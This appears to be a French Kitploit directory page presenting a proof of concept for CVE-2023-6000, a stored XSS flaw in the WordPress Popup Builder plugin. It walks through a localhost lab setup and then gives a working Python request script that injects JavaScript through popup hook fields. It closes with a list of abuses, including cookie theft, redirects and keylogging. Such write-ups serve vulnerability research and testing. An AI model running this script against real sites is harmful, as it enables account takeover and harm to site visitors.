Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-6000-POC — Cette vulnérabilité présente une faille XSS dans un plugin de popup WordPress, permettant aux attaquants d'injecter du JavaScript malveillant via un XSS stocké. | Kitploit
Outils/GitHubGitHub/ronf98/cve-2023-6000-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubronf98/cve-2023-6000-poc

CVE-2023-6000-POC

Cette vulnérabilité présente une faille XSS dans un plugin de popup WordPress, permettant aux attaquants d'injecter du JavaScript malveillant via un XSS stocké.

Voir le dépôt
11il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Détails généraux

  • CVE-ID : CVE-2023-6000
  • Score CVSS : 6.1
  • Type : XSS stocké
  • Version corrigée : Popup Builder 4.2.3

Cette vulnérabilité permet à un attaquant d'exploiter une faille de type Cross-Site Scripting (XSS) dans le plugin WordPress Popup Builder. Le plugin ne parvient pas à empêcher les visiteurs ordinaires de modifier des popups existants et, en envoyant une requête spécialement conçue au serveur, l'attaquant peut injecter des scripts malveillants dans le popup, qui s'exécuteront lorsque les utilisateurs interagiront avec celui-ci.

Pour cette POC, la vulnérabilité se déclenchera en manipulant le comportement d'ouverture du popup, où un simple script d'alerte sera injecté pour s'exécuter à l'ouverture du popup. Ce type d'attaque peut entraîner divers problèmes, notamment un accès non autorisé à des informations sensibles et une exploitation ultérieure du site Web affecté, compromettant potentiellement les données des utilisateurs ou l'ensemble du site.

Configuration de l'environnement POC

  1. Téléchargez XAMPP pour héberger le serveur Web local (dernière version)
  2. Créez une base de données SQL
  3. Installez WordPress (dernière version)
  4. Accédez à l'admin WordPress et installez une version vulnérable de Popup Builder (<4.2.3)
  5. Configurez une simple page d'accueil et un popup pour afficher la vulnérabilité

Étape 1 : XAMPP

Pour cette POC, nous pouvons utiliser une machine Windows 10 et télécharger XAMPP : https://www.apachefriends.org/download.html
Après installation, assurez-vous d'activer les modules Apache et MySQL :

image

Étape 2 : Base de données SQL

WordPress, comme la plupart des systèmes de gestion de contenu, nécessite une base de données pour stocker toutes ses données essentielles. La base de données SQL que nous allons créer sert de stockage central pour toutes ces informations.

  • Dans votre navigateur, accédez à http://localhost/phpmyadmin
  • Allez dans l'onglet Bases de données et créez une nouvelle base (ex : wordpress_db).
  • Notez le nom de la base car vous en aurez besoin lors de l'installation de WordPress.

Étape 3 : WordPress

  • Téléchargez WordPress depuis leur site officiel - https://wordpress.org/download/
  • Après téléchargement, extrayez le fichier zip de WordPress dans le dossier de votre installation XAMPP sous C:\xampp\htdocs\
  • Ensuite, accédez à http://localhost/wordpress, ce qui affichera l'écran d'installation.
  • Dans le champ du nom de la base, entrez le nom de la base SQL que nous avons créée, le reste peut rester par défaut (utilisateur : root, mot de passe : vide (par défaut pour XAMPP)).
  • Si la connexion à la base de données réussit, vous pouvez ensuite configurer un utilisateur Admin pour un accès ultérieur.

Étape 4 : Popup Builder

La version vulnérable du plugin Popup Builder peut être téléchargée depuis leur site principal : https://wordpress.org/plugins/popup-builder/advanced/
Choisissez une version antérieure à la correction dans la 4.2.3 :
image
Ensuite, allez sur votre page d'administration WordPress - http://localhost/wordpress/wp-login.php
Extensions -> Ajouter une extension -> Téléverser une extension -> Choisissez le fichier .ZIP téléchargé et installez-le.

Étape 5 : Page d'accueil et Popup

Dans la page d'administration WordPress, nous pouvons créer une simple page d'accueil en allant dans Pages -> Ajouter une page -> Choisir un modèle.
Pour le popup, allez dans Popup Builder -> Ajouter nouveau -> Choisissez le type et personnalisez-le.
Pour cette POC, j'ai sélectionné un popup d'abonnement, car c'est l'un des popups les plus courants sur les sites Web aujourd'hui.
image

Dans l'onglet Règles d'affichage, vous pouvez attacher le popup à votre page d'accueil :
image

Maintenant, lorsque nous accédons à notre page d'accueil via http://localhost/wordpress/
nous pouvons voir notre popup se déclencher.

Exploitation

Pour exécuter l'exploit, nous devons d'abord identifier l'ID du popup.
Cela peut être fait en naviguant sur le site, en déclenchant le popup et en ouvrant l'onglet Réseau dans les outils de développement.
Recherchez la requête admin-ajax.php, un composant central de WordPress utilisé pour gérer les requêtes AJAX.
Popup Builder utilise cela pour gérer des fonctions comme la sauvegarde, la mise à jour, la prévisualisation et le contrôle des popups dans WordPress.

Sous l'onglet Payload, nous pouvons trouver l'ID du popup :

image

Après avoir trouvé l'ID du popup, nous pouvons utiliser le script suivant pour déclencher l'exploit :

root@kitploit:~
import requests

# Define the target URL for the vulnerable site
url = "http://localhost/wordpress/"
headers = {
    "Content-Type": "application/x-www-form-urlencoded"
    }
data = {
    "sgpb-is-preview": "1",
    "post_ID": "22",     #use the Popup ID we found
    "sgpb-type": "html",
    "sgpb-WillOpen": "alert('Stored XSS Executed Successfully');"     #custom JS code goes here
    }

# Send the POST request and output the results
response = requests.post(url, data=data)
print(response.text)

Options supplémentaires

Puisque nous pouvons modifier le popup, nous pouvons également contrôler le moment du déclenchement de notre JS personnalisé. Si nous allons sur la page d'administration WordPress, dans les paramètres du popup, nous pouvons voir une option "JS ou CSS personnalisé", cela contrôlera le moment d'exécution du code personnalisé :

  • "sgpb-ShouldOpen" : S'exécute avant que le popup ne commence à s'ouvrir, vérifiant s'il doit s'ouvrir.
  • "sgpb-WillOpen" : S'exécute juste avant l'ouverture du popup, permettant des actions de dernière seconde.
  • "sgpb-DidOpen" : S'exécute juste après que le popup se soit complètement ouvert, idéal pour des actions post-chargement (ex : XSS).
  • "sgpb-ShouldClose" : Vérifications ou actions déclenchées avant que le popup ne commence à se fermer.
  • "sgpb-WillClose" : S'exécute juste avant la fermeture du popup, permettant des modifications finales.
  • "sgpb-DidClose" : S'exécute immédiatement après la fermeture complète du popup.

image

Nous pouvons ensuite intégrer cela dans notre script selon l'utilisation souhaitée.

Exécution

Après avoir déclenché le script, nous pouvons voir dans la page d'administration WordPress qu'une nouvelle ligne a été ajoutée à la section JS personnalisé de notre popup :

image

Maintenant, en accédant au site en tant qu'utilisateur normal, nous pouvons voir le message suivant s'afficher :

image

Nous pouvons également voir que notre message a été sauvegardé dans la base de données SQL (dans la table wp_postmeta par défaut), ce qui confirme qu'il s'agit d'un XSS stocké :

image

Utilisation possible

Cette vulnérabilité de type XSS stocké dans le plugin Popup Builder permet à l'attaquant d'intégrer du JavaScript malveillant qui peut s'exécuter chaque fois qu'un utilisateur interagit avec le popup infecté. Voici des moyens de l'exploiter de manière malveillante :

  • Détournement de session : Un code JS malveillant peut voler les cookies de session et les envoyer vers un domaine externe, permettant aux attaquants de prendre le contrôle des comptes utilisateurs.
  • Redirection : Le script peut rediriger les utilisateurs vers de fausses pages de connexion ou d'autres sites malveillants (cela peut être fait en ajoutant le code JS suivant : window.location.href = 'https://facebook.com')
  • Téléchargements furtifs (drive-by downloads) : L'attaquant peut déclencher le téléchargement de fichiers malveillants, poussant les utilisateurs à installer involontairement des logiciels malveillants.
  • Défiguration et désinformation : Les scripts injectés peuvent manipuler le contenu de la page, défigurant le site ou affichant de fausses informations aux utilisateurs.
  • Keylogger : Des scripts malveillants peuvent être utilisés pour enregistrer les frappes des utilisateurs, capturant des données sensibles et des informations personnelles, puis les envoyant vers le domaine de l'attaquant.
Télécharger l’outil